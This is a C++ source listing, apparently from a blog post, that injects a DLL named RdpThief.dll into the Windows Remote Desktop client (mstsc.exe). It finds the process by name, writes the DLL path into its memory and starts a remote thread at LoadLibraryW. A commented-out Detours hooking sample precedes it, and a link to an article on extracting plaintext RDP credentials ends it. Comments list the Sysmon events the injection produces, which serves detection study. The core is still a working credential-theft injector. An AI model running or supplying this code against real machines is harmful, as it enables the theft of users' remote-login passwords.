dll注入 c++

根据进程名查找 PID,然后向该 PID 对应的进程注入 DLL。

// detourstest.cpp : 定义控制台应用程序的入口点。
//

#include "stdafx.h"
#include "Windows.h"
#include <detours.h>
#include <string.h>
#include <tlhelp32.h>
#pragma comment (lib,"detours.lib")

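// Element count of a real array. The argument must be an array, not a pointer:
// for a pointer, sizeof yields the pointer size and the result is meaningless.
// The argument is parenthesized before indexing so that an expression argument
// is indexed as a whole. Not referenced by the code shown in this listing.
#define ArraySize(ptr)    (sizeof(ptr) / sizeof((ptr)[0]))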
/*
static int(WINAPI *TrueMessageBox)(HWND, LPCTSTR, LPCTSTR, UINT) = MessageBox;
int WINAPI OurMessageBox(HWND hWnd, LPCTSTR lpText, LPCTSTR lpCaption, UINT uType) {
	return TrueMessageBox(NULL, L"Hooked", lpCaption, 0);
}
int main()
{
	DetourTransactionBegin();
	DetourUpdateThread(GetCurrentThread());
	DetourAttach(&(PVOID&)TrueMessageBox, OurMessageBox);
	DetourTransactionCommit();
	MessageBox(NULL, L"Hello", L"Hello", 0);
	DetourTransactionBegin();
	DetourUpdateThread(GetCurrentThread());
	DetourDetach(&(PVOID&)TrueMessageBox, OurMessageBox);
	DetourTransactionCommit();
}
*/


// Forward declaration; the definition follows main(). Returns TRUE and stores
// the process id in dwPid when a process with the given image name is found.
BOOL FindProcessPid(LPCWSTR ProcessName, DWORD& dwPid);


/*
 * Entry point of the sample. It looks up mstsc.exe by image name and, if a
 * process is found, asks that process to load C:\RdpThief.dll by starting a
 * remote thread at LoadLibraryW with the DLL path as its argument.
 *
 * None of the Win32 return values in the injection branch are checked, so a
 * failed step is silent. The thread handle returned by CreateRemoteThread is
 * never closed, and the buffer allocated in the target is never released.
 *
 * Defender notes (what this sequence looks like from the outside):
 *   - A cross-process handle to mstsc.exe requested with PROCESS_ALL_ACCESS
 *     (Sysmon Event ID 10, ProcessAccess).
 *   - VirtualAllocEx + WriteProcessMemory into the target, then a remote
 *     thread whose start address is LoadLibraryW (Sysmon Event ID 8,
 *     CreateRemoteThread).
 *   - A DLL loaded into mstsc.exe from a path outside the usual system
 *     directories (Sysmon Event ID 7, ImageLoad).
 *   - The wide-character DLL path stays in a committed read/write region of
 *     the target, because nothing in this function frees it.
 * Always returns 0, whether or not the target process was found.
 */
int main()
{
	// Image name of the process to look for; compared verbatim by FindProcessPid.
	LPCWSTR Name = L"mstsc.exe";
	// StopMyService();
	DWORD dwPid = 0;
	HANDLE ProcessHandle;
	PVOID RemoteBuffer;
	// Hard-coded absolute path of the DLL; sizeof DllPath below includes the
	// terminating NUL, so the full wide string is copied into the target.
	wchar_t DllPath[] = TEXT("C:\\RdpThief.dll");




	if (FindProcessPid(Name, dwPid))
	{
		//printf("[%ls] [%d]\n",Name, dwPid);
		// Full-access handle to the target; the result is not checked for NULL.
		ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
		// Commit a read/write region in the target large enough for the path.
		RemoteBuffer = VirtualAllocEx(ProcessHandle, NULL, sizeof DllPath, MEM_COMMIT, PAGE_READWRITE);
		// Copy the DLL path into that region (bytes-written output is not requested).
		WriteProcessMemory(ProcessHandle, RemoteBuffer, (LPVOID)DllPath, sizeof DllPath, NULL);
		// Address of LoadLibraryW as resolved in THIS process; the code relies on
		// it being the same address in the target - NOTE(review): assumption, confirm.
		PTHREAD_START_ROUTINE threatStartRoutineAddress = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
		// Start a thread in the target at LoadLibraryW(RemoteBuffer); the returned
		// thread handle is discarded and the thread is not waited on.
		CreateRemoteThread(ProcessHandle, NULL, 0, threatStartRoutineAddress, RemoteBuffer, 0, NULL);
		// Only the process handle is closed; RemoteBuffer stays allocated in the target.
		CloseHandle(ProcessHandle);

	}
	else
	{
		// No process with that image name was present in the snapshot.
		printf("[%ls] [Not Found]\n", Name);
	}
	
	return 0;
}

/*
 * Looks up a running process by executable image name.
 *
 * ProcessName  image name to match against each snapshot entry's szExeFile;
 *              the comparison uses lstrcmp, so it is case-sensitive.
 * dwPid        receives the process id of the first matching entry; it is
 *              left untouched when nothing matches.
 *
 * Returns TRUE when a match was found, FALSE when the snapshot could not be
 * created, could not be read, or contained no matching entry.
 */
BOOL FindProcessPid(LPCWSTR ProcessName, DWORD& dwPid)
{
	// Snapshot of every process currently in the system.
	HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (snapshot == INVALID_HANDLE_VALUE)
		return FALSE;

	// dwSize must be filled in before the first Process32First call.
	PROCESSENTRY32 entry;
	entry.dwSize = sizeof(entry);

	BOOL found = FALSE;
	for (BOOL more = Process32First(snapshot, &entry); more; more = Process32Next(snapshot, &entry))
	{
		if (lstrcmp(ProcessName, entry.szExeFile) == 0)
		{
			// First match wins; later processes with the same name are ignored.
			dwPid = entry.th32ProcessID;
			found = TRUE;
			break;
		}
	}

	// The snapshot handle is released on every path that created it.
	CloseHandle(snapshot);
	return found;
}

https://www.c0bra.xyz/2019/12/24/mstsc%E4%B8%AD%E6%8F%90%E5%8F%96%E6%98%8E%E6%96%87%E5%87%AD%E6%8D%AE-RdpThief%E5%AE%9E%E8%B7%B5/
